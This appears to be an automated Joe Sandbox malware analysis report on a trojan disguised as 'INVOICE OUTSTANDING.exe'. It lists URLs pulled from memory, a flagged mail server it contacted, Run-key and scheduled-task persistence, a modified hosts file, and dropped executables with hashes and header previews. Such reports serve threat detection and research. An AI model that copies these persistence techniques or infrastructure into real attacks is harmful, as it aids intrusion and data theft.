                    http://www.carterandcone.comINVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comINVOICE OUTSTANDING.exe, 00000000.00000003.258362405.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258530065.0000000005DB3000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmINVOICE OUTSTANDING.exe, 00000000.00000003.274775393.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.273884816.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274864897.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.274960497.0000000005D9A000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.275003587.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://fontfabrik.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.comalicCCINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fonts.comicINVOICE OUTSTANDING.exe, 00000000.00000003.258155841.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cnlINVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.comaCCINVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://DynDns.comDynDNSnamejidpasswordPsi/PsiRegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fonts.comnINVOICE OUTSTANDING.exe, 00000000.00000003.258239730.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleaseINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.fonts.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.sandoll.co.krINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deDPleaseINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.founder.com.cn/cnl-sINVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.zhongyicts.com.cnINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      https://Vvf6edm0NHgn8Mct.comRegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameINVOICE OUTSTANDING.exe, 00000000.00000002.334218566.0000000002E75000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.sakkal.comINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.comueedINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.fontbureau.comalsdINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.founder.com.cn/cnr-fINVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          http://www.fontbureau.comINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://www.fontbureau.comFINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comcom/pCINVOICE OUTSTANDING.exe, 00000000.00000003.269917714.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.agfamonotype.INVOICE OUTSTANDING.exe, 00000000.00000003.275083576.0000000005DA4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fonts.comn-uINVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwRegSvcs.exe, 0000000E.00000002.537876981.0000000003511000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.founder.com.cn/cn/cr%XINVOICE OUTSTANDING.exe, 00000000.00000003.261782172.0000000005D94000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tiro.comlicINVOICE OUTSTANDING.exe, 00000000.00000003.258837182.0000000005DAB000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.sandoll.co.kreINVOICE OUTSTANDING.exe, 00000000.00000003.260100666.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.comaINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.come.comINVOICE OUTSTANDING.exe, 00000000.00000003.322102237.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.347616586.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.microft.cRegSvcs.exe, 0000000E.00000003.362147300.00000000067C1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.carterandcone.comlINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.fontbureau.com/designers/cabarga.htmlMINVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.fontbureau.com/designers/cabarga.htmlNINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://www.founder.com.cn/cnINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261791694.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261227330.0000000005D94000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261899825.0000000005D9B000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.261182333.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://www.fontbureau.com/designers/frere-jones.htmlINVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/cabarga.htmlINVOICE OUTSTANDING.exe, 00000000.00000003.268824829.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268851153.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268670914.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268730021.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268758763.0000000005DCD000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268943050.0000000005DCD000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.fontbureau.com/pCINVOICE OUTSTANDING.exe, 00000000.00000003.267953980.0000000005D99000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.267043053.0000000005D98000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.268522512.0000000005D9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.jiyu-kobo.co.jp/INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers8INVOICE OUTSTANDING.exe, 00000000.00000002.347925110.0000000007052000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.sajatypeworks.comdifINVOICE OUTSTANDING.exe, 00000000.00000003.257901573.0000000005DB3000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258048117.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257978730.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258250097.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257944160.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258298723.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258070392.0000000005DB4000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.257875244.0000000005DB2000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.258179215.0000000005DB4000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://mail.oceanskylogistics.inRegSvcs.exe, 0000000E.00000002.545492635.000000000386C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carterandcone.comandINVOICE OUTSTANDING.exe, 00000000.00000003.264428534.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.263804833.0000000005D9D000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000003.264182537.0000000005D9D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        43.255.154.57
                                        		mail.oceanskylogistics.inSingapore
                                        		26496AS-26496-GO-DADDY-COM-LLCUStrue

                                        General Information

                                        Joe Sandbox Version:35.0.0 Citrine
                                        Analysis ID:680571
                                        Start date and time: 08/08/202220:18:102022-08-08 20:18:10 +02:00
                                        Joe Sandbox Product:CloudBasic
                                        Overall analysis duration:0h 8m 30s
                                        Hypervisor based Inspection enabled:false
                                        Report type:light
                                        Sample file name:INVOICE OUTSTANDING.exe
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                        Number of analysed new started processes analysed:30
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • HDC enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.troj.adwa.spyw.evad.winEXE@11/8@1/1
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HDC Information:Failed
                                        HCA Information:
                                        • Successful, ratio: 97%
                                        • Number of executed functions: 0
                                        • Number of non-executed functions: 0
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Adjust boot time
                                        • Enable AMSI

                                        Warnings

                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                        • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, login.live.com, sls.update.microsoft.com, ctldl.windowsupdate.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        20:20:23API Interceptor1x Sleep call for process: INVOICE OUTSTANDING.exe modified
                                        20:20:50API Interceptor541x Sleep call for process: RegSvcs.exe modified
                                        20:20:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run kECjS C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        20:21:02AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run kECjS C:\Users\user\AppData\Roaming\kECjS\kECjS.exe

                                        Joe Sandbox View / Context

                                        IPs

                                        No context

                                        Domains

                                        No context

                                        ASNs

                                        No context

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\INVOICE OUTSTANDING.exe.log

                                        Download File
                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1216
                                        Entropy (8bit):5.355304211458859
                                        Encrypted:false
                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                        MD5:69206D3AF7D6EFD08F4B4726998856D3
                                        SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                        SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                        SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\kECjS.exe.log

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:modified
                                        Size (bytes):142
                                        Entropy (8bit):5.090621108356562
                                        Encrypted:false
                                        SSDEEP:3:QHXMKa/xwwUC7WglAFXMWA2yTMGfsbNRLFS9Am12MFuAvOAsDeieVyn:Q3La/xwczlAFXMWTyAGCDLIP12MUAvvw
                                        MD5:8C0458BB9EA02D50565175E38D577E35
                                        SHA1:F0B50702CD6470F3C17D637908F83212FDBDB2F2
                                        SHA-256:C578E86DB701B9AFA3626E804CF434F9D32272FF59FB32FA9A51835E5A148B53
                                        SHA-512:804A47494D9A462FFA6F39759480700ECBE5A7F3A15EC3A6330176ED9C04695D2684BF6BF85AB86286D52E7B727436D0BB2E8DA96E20D47740B5CE3F856B5D0F
                                        Malicious:false
                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.EnterpriseServices, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..

                                        C:\Users\user\AppData\Local\Temp\tmp69D2.tmp

                                        Download File
                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1642
                                        Entropy (8bit):5.1822034700146205
                                        Encrypted:false
                                        SSDEEP:24:2dH4+SEqC/Q7hxlNMFp1/rlMhEMjnGpwjpIgUYODOLD9RJh7h8gKBJYtn:cbh47TlNQ//rydbz9I3YODOLNdq3S
                                        MD5:2B04C027DCB9FF6FBBB8566586DA0617
                                        SHA1:A349F8FD51F9D28B0F35CEDD9FFA14A608C419B6
                                        SHA-256:E0C5C7F2EAC8081C8BF375CE293F7426421D9EDB7873ADFD14B3D851B7208252
                                        SHA-512:15B6E73A6D0ED9F862D331AA04E76302DC905FF9D9022AE883B17F598BB7919913F44771807CBA1830035646E23031993D1DED132E807CC60321DB33435B9AC9
                                        Malicious:true
                                        Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <RegistrationInfo>.. <Date>2014-10-25T14:27:44.8929027</Date>.. <Author>computer\user</Author>.. </RegistrationInfo>.. <Triggers>.. <LogonTrigger>.. <Enabled>true</Enabled>.. <UserId>computer\user</UserId>.. </LogonTrigger>.. <RegistrationTrigger>.. <Enabled>false</Enabled>.. </RegistrationTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">.. <UserId>computer\user</UserId>.. <LogonType>InteractiveToken</LogonType>.. <RunLevel>LeastPrivilege</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>true

                                        C:\Users\user\AppData\Roaming\ahgeNfsrA.exe

                                        Download File
                                        Process:C:\Users\user\Desktop\INVOICE OUTSTANDING.exe
                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:dropped
                                        Size (bytes):1031168
                                        Entropy (8bit):7.486735500072679
                                        Encrypted:false
                                        SSDEEP:24576:ru18pEJHoMv9vxksAEtn1vH2sP6BqoFi/ep:iipE1oMvPpCsVcpp
                                        MD5:0FA9D94D6393235F67A17B220902DBFA
                                        SHA1:3C0AE56AB072F622DA13806B4336F01F7137EE4C
                                        SHA-256:65EA111F533E1283B202B87434EA207410C1680EADC9B2193C76179EB87DECFC
                                        SHA-512:1C2D817ADDC45161E63667895E1C54306E5F8F27F4804D6D7A06163B62451B3189E7FA6608B24BB7DD8969B23285286E82750351F1322B2714A31546FAB9B5C5
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 38%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b..............P.............V.... ........@.. ....................... ............@.....................................O.................................................................................... ............... ..H............text...\.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................8.......H.......8~..\H..............p.............................................( ...*&..(!....*.s"........s#........s$........s%........s&........*...0...........~....o'....+..*.0...........~....o(....+..*.0...........~....o)....+..*.0...........~....o*....+..*.0...........~....o+....+..*.0..<........~.....(,.....,!r...p.....(-...o....s/............~.....+..*.0...........~.....+..*".......*.0..&........(....r5..p~....o0...(1.....t$....+..*...0..&........(....rC..p~....o0...(1.....

                                        C:\Users\user\AppData\Roaming\kECjS\kECjS.exe

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Category:modified
                                        Size (bytes):45152
                                        Entropy (8bit):6.149629800481177
                                        Encrypted:false
                                        SSDEEP:768:bBbSoy+SdIBf0k2dsYyV6Iq87PiU9FViaLmf:EoOIBf0ddsYy8LUjVBC
                                        MD5:2867A3817C9245F7CF518524DFD18F28
                                        SHA1:D7BA2A111CEDD5BF523224B3F1CFE58EEC7C2FDC
                                        SHA-256:43026DCFF238F20CFF0419924486DEE45178119CFDD0D366B79D67D950A9BF50
                                        SHA-512:7D3D3DBB42B7966644D716AA9CBC75327B2ACB02E43C61F1DAD4AFE5521F9FE248B33347DFE15B637FB33EB97CDB322BCAEAE08BAE3F2FD863A9AD9B3A4D6B42
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Metadefender, Detection: 0%, Browse
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...zX.Z..............0..d..........V.... ........@.. ..............................."....`.....................................O.......8............r..`>.......................................................... ............... ..H............text...\c... ...d.................. ..`.rsrc...8............f..............@..@.reloc...............p..............@..B................8.......H........+...S..........|...P...........................................r...p(....*2.(....(....*z..r...p(....(....(......}....*..{....*.s.........*.0..{...........Q.-.s.....+i~....o....(.....s.......o.....r!..p..(....Q.P,:.P.....(....o....o ........(....o!...o".....,..o#...t......*..0..(....... ....s$........o%....X..(....-..*.o&...*.0...........('......&.....*.*...................0...........(.......&.....*.................0............(.....(....~....,.(....~....o....9]...

                                        C:\Windows\System32\drivers\etc\hosts

                                        Download File
                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):835
                                        Entropy (8bit):4.694294591169137
                                        Encrypted:false
                                        SSDEEP:24:QWDZh+ragzMZfuMMs1L/JU5fFCkK8T1rTt8:vDZhyoZWM9rU5fFcP
                                        MD5:6EB47C1CF858E25486E42440074917F2
                                        SHA1:6A63F93A95E1AE831C393A97158C526A4FA0FAAE
                                        SHA-256:9B13A3EA948A1071A81787AAC1930B89E30DF22CE13F8FF751F31B5D83E79FFB
                                        SHA-512:08437AB32E7E905EB11335E670CDD5D999803390710ED39CBC31A2D3F05868D5D0E5D051CCD7B06A85BB466932F99A220463D27FAC29116D241E8ADAC495FA2F
                                        Malicious:true
                                        Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....127.0.0.1

                                        \Device\ConDrv

                                        Download File
                                        Process:C:\Users\user\AppData\Roaming\kECjS\kECjS.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):1141
                                        Entropy (8bit):4.44831826838854
                                        Encrypted:false
                                        SSDEEP:24:zKLXkb4DObntKlglUEnfQtvNuNpKOK5aM9YJC:zKL0b4DQntKKH1MqJC
                                        MD5:1AEB3A784552CFD2AEDEDC1D43A97A4F
                                        SHA1:804286AB9F8B3DE053222826A69A7CDA3492411A
                                        SHA-256:0BC438F4B1208E1390C12D375B6CBB08BF47599D1F24BD07799BB1DF384AA293
                                        SHA-512:5305059BA86D5C2185E590EC036044B2A17ED9FD9863C2E3C7E7D8035EF0C79E53357AF5AE735F7D432BC70156D4BD3ACB42D100CFB05C2FB669EA22368F1415
                                        Malicious:false
                                        Preview:Microsoft (R) .NET Framework Services Installation Utility Version 4.7.3056.0..Copyright (C) Microsoft Corporation. All rights reserved.....USAGE: regsvcs.exe [options] AssemblyName..Options:.. /? or /help Display this usage message... /fc Find or create target application (default)... /c Create target application, error if it already exists... /exapp Expect an existing application... /tlb:<tlbfile> Filename for the exported type library... /appname:<name> Use the specified name for the target application... /parname:<name> Use the specified name or id for the target partition... /extlb Use an existing type library... /reconfig Reconfigure existing target application (default)... /noreconfig Don't reconfigure existing target application... /u Uninstall target application... /nologo Suppress logo output... /quiet Suppress logo output and success output... /c

                                        Static File Info

